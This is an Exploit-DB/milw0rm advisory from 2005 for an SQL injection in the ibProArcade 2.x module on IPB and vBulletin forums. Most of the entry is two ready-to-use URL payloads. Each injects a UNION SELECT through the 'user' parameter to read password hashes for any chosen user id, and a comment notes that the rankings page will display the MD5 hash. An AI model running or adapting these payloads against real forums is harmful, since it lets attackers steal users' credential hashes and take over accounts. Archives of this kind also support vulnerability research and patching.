ibProArcade 2.x - module 'vBulletin/IPB' SQL Injection

EDB-ID:

1296


Author:

B~HFH

Type:

webapps


Platform:

PHP

Date:

2005-11-06


# Rankings for (name) will state the md5 hash for the user /str0ke
# ibProArcade 2.x

IPB:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]

vBulettin forums:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]

Author: B~HFH
Email:  bhfh01@gmail.com

# milw0rm.com [2005-11-06]